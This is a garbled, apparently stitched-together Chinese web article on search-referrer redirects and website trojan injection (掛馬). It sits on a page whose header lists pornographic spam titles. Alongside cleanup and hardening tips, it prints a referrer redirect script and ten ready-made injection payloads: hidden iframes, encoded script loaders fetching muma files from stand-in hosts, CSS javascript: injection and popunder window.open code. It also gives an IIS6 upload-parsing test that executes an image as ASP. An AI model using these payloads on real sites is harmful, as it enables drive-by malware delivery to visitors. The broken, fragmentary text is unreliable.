丁香五月亚洲中文字幕|97人妻无码公开免费视频|日韩人妻中文免费二区|免费 日韩 AV 在线

  • <legend id="pelpv"><i id="pelpv"></i></legend>
  • <span id="pelpv"></span>

      1. 熱門搜索:網(wǎng)頁游戲 火箭球賽 熱門音樂 2011世界杯 亞運會 黃海軍演
        您現(xiàn)在的位置:首頁 >> 美食文化 >> 內(nèi)容

        關(guān)于用搜索引擎搜索出來網(wǎng)站跳轉(zhuǎn)的問題解決和常見的掛馬代碼

        時間:2014/12/11 13:25:04 點擊:

         

         

          (信宜新聞網(wǎng)/訊)關(guān)于“網(wǎng)站直接輸入域名正常進入,用搜索引擎搜索出來的鏈接點擊進入,就直接跳轉(zhuǎn)到其他網(wǎng)址”這個問題,相信很多用別人源碼建網(wǎng)的站長都碰到過,那么要怎么解決呢,這個問題難倒了不少站長,請耐心看完本文。

         

              1.var regexp=/\.(baidu)(\.[a-z0-9\-]+) {1,2}\//ig;var where =document.referrer;if(regexp.test(whe re)){window.location.href=http://www.1xy.cc/bbs/thread-1970252-1-1.html"百度來的訪客 帶到 的地址"}把代碼存到JS文件 然后網(wǎng)站 首頁調(diào)用這個JS文件 就OK了

         

          2.改mdb、改后臺登錄名

         

          3.如果打開圖片不顯示就基本是JS掛馬了

         

          4.把首頁有關(guān)js/gif的文件都用文本打開檢查

         

          5.重點檢查數(shù)據(jù)庫inc.asp、index.asp文件,看看里面是否被修改了數(shù)據(jù)庫鏈接轉(zhuǎn)向,有的黑客把Config.asp備份了一個,只不過備份的Config.asp名字改了,但是inc鏈接的是這個被改了名字的Config.asp。所以從搜索引擎進入就會跳轉(zhuǎn)到別人網(wǎng)站。本人以前也遇到過這樣的事情,后來把網(wǎng)站源碼檢查了一遍才找到這個inc.asp出了問題。

         

          二、.原來的文件即可。 修補漏洞(修補網(wǎng)站漏洞也就是做一下 網(wǎng)站安全。) 1、修改網(wǎng)站后臺的用戶名和密碼及后 臺的默認路徑。 2、更改數(shù)據(jù)庫名,如果是ACCESS數(shù)據(jù) 庫,那文件的擴展名最好不要用mdb, 改成ASP的,文件名也可以多幾個特殊 符號。 3、接著檢查一下網(wǎng)站有沒有注入漏洞 或跨站漏洞,如果有的話就相當打上防 注入或防跨站補丁。 4、檢查一下網(wǎng)站的上傳文件,常見了 有欺騙上傳漏洞,就對相應的代碼進行 過濾。 5、盡可能不要暴露網(wǎng)站的后臺地址, 以免被社會工程學猜解出管理用戶和密 碼。 6、寫入一些防掛馬代碼,讓框架代碼 等掛馬無效。 7、禁用FSO權(quán)限也是一種比較絕的方 法。 8、修改網(wǎng)站部分文件夾的讀寫權(quán)限。 9、如果你是自己的服務器,那就不僅 要對你的網(wǎng)站程序做一下安全了,而且 要對你的服務器做一下安全也是很有必 要了! 補充一下:盡量不要下載網(wǎng)上的那一些 免費程序,因為那一些程序中大部分都有后門。

         

          三、如果你是自己寫的代碼,每一行什么含 義、什么作用肯定很清楚,一行一行查 找分析。 如果是別人代寫的,或者是下載的,那 就讓寫的人幫助檢查,或者使用備份文 件覆蓋,或者重新下載一個覆蓋被嵌入 惡意代碼的頁面。 如果這些條件都不具備,試著自己逐行 檢查,看看是否有類似script、iframe 的字符,刪除后檢查還有沒有惡意代碼 嵌入的癥狀(記得做備份),還有要查 看有沒有一串毫無意義的字符比 如“%B6%F1%D2%E2%B4%FA%C2%EB” 表示“惡意代碼”四個字,只是經(jīng)過簡單 加密,正常網(wǎng)頁中不應該出現(xiàn)。

         

          四、這個前綴是可以隨意更換的,我 上面取名為"v",例如我可以換成: abc123:expression(this.src='about:b lank',this.outerHTML=''); 掛木馬的家 伙得先看你的CSS里這個前綴,然后掛 馬的時候?qū)懗蛇@樣<iframe style="abc123:expression() !important" src="URL"></iframe>,那 個前綴一定要是和你的網(wǎng)站一樣的 (abc123),才能掛到馬,哈哈哈!如 果把前綴做成動態(tài)的,就非常OK了, 看你怎么掛!

         

          五、知識重點:如何防止網(wǎng)站被掛馬?掛 馬代碼大全 做網(wǎng)站的人知道也不小心 網(wǎng)站就被黑客掛了木馬那個頭痛呀! 首先引起了網(wǎng)友的反感。從些不在上 自己的網(wǎng)站。搜索還懲罰,真是倒霉 呀。下面我們就了解一下,網(wǎng)站是..

         

          六、如何防止網(wǎng)站被掛馬?掛馬代碼大全

         

          做網(wǎng)站的人知道也不小心網(wǎng)站就被黑 客掛了木馬那個頭痛呀!首先引起了 網(wǎng)友的反感。從些不在上自己的網(wǎng) 站。搜索還懲罰,真是倒霉呀。下面 我們就了解一下,網(wǎng)站是如何中 毒的。

         

          1:框架掛馬

         

          <iframe src=地址 width=0 height=0> </iframe>

         

          2:js文件掛馬

         

          首先將以下代碼

         

          document.write("<iframe width='0' height='0' src='地址'></iframe>");

         

          保存為xxx.js,

         

          則JS掛馬代碼為

         

          <script language=javascript src=xxx.js></script>

         

          3:js變形加密

         

          <SCRIPT language="JScript.Encode" src=http://www.xxx.com/muma.txt> </script>

         

          muma.txt可改成任意后綴 電腦知識

         

          4:body掛馬

         

          <body ></body>

         

          5:隱蔽掛馬

         

          top.document.body.innerHTML = top.document.body.innerHTML + '\r\n<iframe src="http://www.xxx.com/muma.htm/"></iframe>';

         

          6:css中掛馬

         

          body {

         

          background-image: url('javascript:document.write(" <script src=http://www.XXX.net/muma.js></script>")')}

         

          7:JAJA掛馬

         

          <SCRIPT language=javascript>

         

          window.open ("地 址","","toolbar=no,location=no,directo ries=no,status=no,menubar=no,scro llbars=no,width=1,height=1");

         

          </script>

         

          8:圖片偽裝

         

          <html>

         

          <iframe src="網(wǎng)馬地址" height=0 width=0></iframe>

         

          <img src="圖片地址"></center>

         

          </html>

         

          9:偽裝調(diào)用:

         

          <frameset rows="444,0" cols="*">

         

          <frame src="打開網(wǎng)頁" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0">

         

          <frame src="網(wǎng)馬地址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0">

         

          </frameset>

         

          10:高級欺騙

         

          <a href="http://www.163.com(迷惑 連接地址,顯示這個地址指向木馬地 址)" > 頁面要顯示的內(nèi)容 </a>

         

          <SCRIPT Language="JavaScript">

         

          function www_163_com ()

         

          {

         

          var url="網(wǎng)馬地址";

         

          open(url,"NewWindow","toolbar=no,l ocation=no,directories=no,status=no ,menubar=no,scrollbars=no,resizable =no,copyhistory=yes,width=800,heig ht=600,left=10,top=10");

         

          }

         

          </SCRIPT>

         

          七、如何防止網(wǎng)站被掛馬

         

          A。為什么好好的網(wǎng)站會有木馬?一般木馬是來自ASP SHELL和PHP SHELL的程序段控制不嚴,程序上有 上傳功能,沒有進行文件目錄和文件 后綴等的判斷,一般這類的目錄, 以“海陽頂端網(wǎng)ASP木馬”較為流行。因2003平臺IIS6原因,也存在目錄名 問題引起ASP木馬。( 微軟的IIS 6存在 嚴重解析文件名錯誤

         

          測試辦法:在FTP中建立一個 test.asp 的文件夾,文件夾名就是 test.asp ,在這個文件夾中上傳一個 hack.jpg,這個jpg的內(nèi)容可以直接 是,然后,用IE遠程訪問這個 hack.jpg,你可以發(fā)現(xiàn),它一樣被當 作是ASP文件來運行!顯然,只要你 的網(wǎng)站程序,允許用戶自己建立文件 夾及上傳圖片,黑客就可以上傳圖片 來當作ASP木馬來運行。

         

          解決辦法:所有使用星外虛擬主機管 理平臺的虛擬主機用戶,可以在主機 面板,設置執(zhí)行權(quán)限選項中,直接將 有上傳權(quán)限的目錄,取消ASP的運行 權(quán)限,就可以解決這個問題。

         

          大家常用的動易2006和動網(wǎng),BLOG 這類的程序,需要詳細的檢查一下, 并跟著開發(fā)者進行相應的安全程序升 級。這樣才能減少因代碼原因引起的

         

          現(xiàn)在最多見的JS掛馬方法有兩種 ,一種是直接將JavaScript腳本代碼 寫在網(wǎng)頁中,當訪問者在瀏覽網(wǎng)頁時 ,惡意的掛馬腳本就會通過用戶的瀏 覽器悄悄地打開網(wǎng)馬窗口,隱藏地運 行。

         

          這種方法使用的關(guān)鍵代碼如下:

         

          window.open("http://www.hack er.com/木馬.html","","toolbar=no,loca tion=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,hei ght=1");

         

          這種代碼往往很長,很容易被安 全工程師發(fā)現(xiàn),而且沒有經(jīng)驗的黑客 也喜歡將“width”和“height=”參數(shù)設為 “0”,但是設置為0后,可能會出現(xiàn)惡 意代碼不運行的情況。

         

          另外一種JS掛馬方式是,黑客先 將掛馬腳本代碼“document.write('<If rame src="網(wǎng)頁木馬地址" >

         

          或者

         

          document.write("

         

          ")

         

          document.write(" ")

         

          document.write("

         

          ")

         

          就成功地將木馬掛到了對方的網(wǎng)頁中了。

         

          小提示:黑客還可以根據(jù)情況隨機變換插入的JS掛馬方法。刪除一段和baidu以及http請求相關(guān)的VB代碼即可!網(wǎng)站中被插入文件了,檢查有無Global.asa 和Global.asax 文件.

         

         

        作者:信宜人 錄入:信宜人 來源:原創(chuàng)
        相關(guān)評論
        發(fā)表我的評論
        • 大名:
        • 內(nèi)容:
      2. 關(guān)于我們 | 服務條款 | 法律聲明 | 文章發(fā)布 | 在線留言 | 法律支援 | 人員認證 | 投訴建議 | 合作聯(lián)盟 | 版權(quán)所有 | 本站wap手機訪問
      3. 西安新聞網(wǎng)(hzshanye.cn) © 2024 版權(quán)所有 All Rights Reserved.
      4. 有害短信息舉報 | 陽光·綠色網(wǎng)絡工程 | 版權(quán)保護投訴指引 | 網(wǎng)絡法制和道德教育基地 | 西安通管局

      5. 南通新聞網(wǎng) 版 權(quán) 所 有 ,未 經(jīng) 書 面 授 權(quán) 禁 止 使 用
        商業(yè)咨詢 信息來自網(wǎng)絡,不代表本站觀點,如有版權(quán)問題聯(lián)系客服!QQ:501734467
      6. #